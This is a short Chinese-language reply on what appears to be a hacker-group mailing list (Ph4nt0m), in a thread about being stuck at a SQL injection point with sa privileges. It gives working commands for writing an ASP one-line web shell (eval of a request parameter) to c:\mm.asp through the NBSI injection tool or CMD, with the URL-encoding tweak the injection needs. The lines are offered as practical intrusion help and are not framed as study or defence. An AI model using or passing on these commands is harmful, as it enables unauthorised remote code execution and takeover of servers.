几乎不是问题,用NBSI等注入工具执行命令echo写马,要注入肯定要注意URL编码的问题。
echo ^<%25eval(request("a"))%25^> > c:\mm.asp
CMD下执行echo ^<%eval(request("a"))%^> > c:\mm.asp 写马
nbsi里执行命令写马要用echo ^<%25eval(request("a"))%25^> > c:\mm.asp
--~--~---------~--~----~------------~-------~--~----~
要向邮件组发送邮件,请发到 [email protected]
要退订此邮件,请发邮件至 [EMAIL PROTECTED]
-~----------~----~----~----~------~----~------~--~---- [Ph4nt0m] Re: 被一个sa权限注入点卡住了- -! X4ng
- [Ph4nt0m] Re: 被一个sa权限注入点卡住了- -! 一刀终情
- [Ph4nt0m] Re: 被一个sa权限注入点卡住了- -! tr4c3
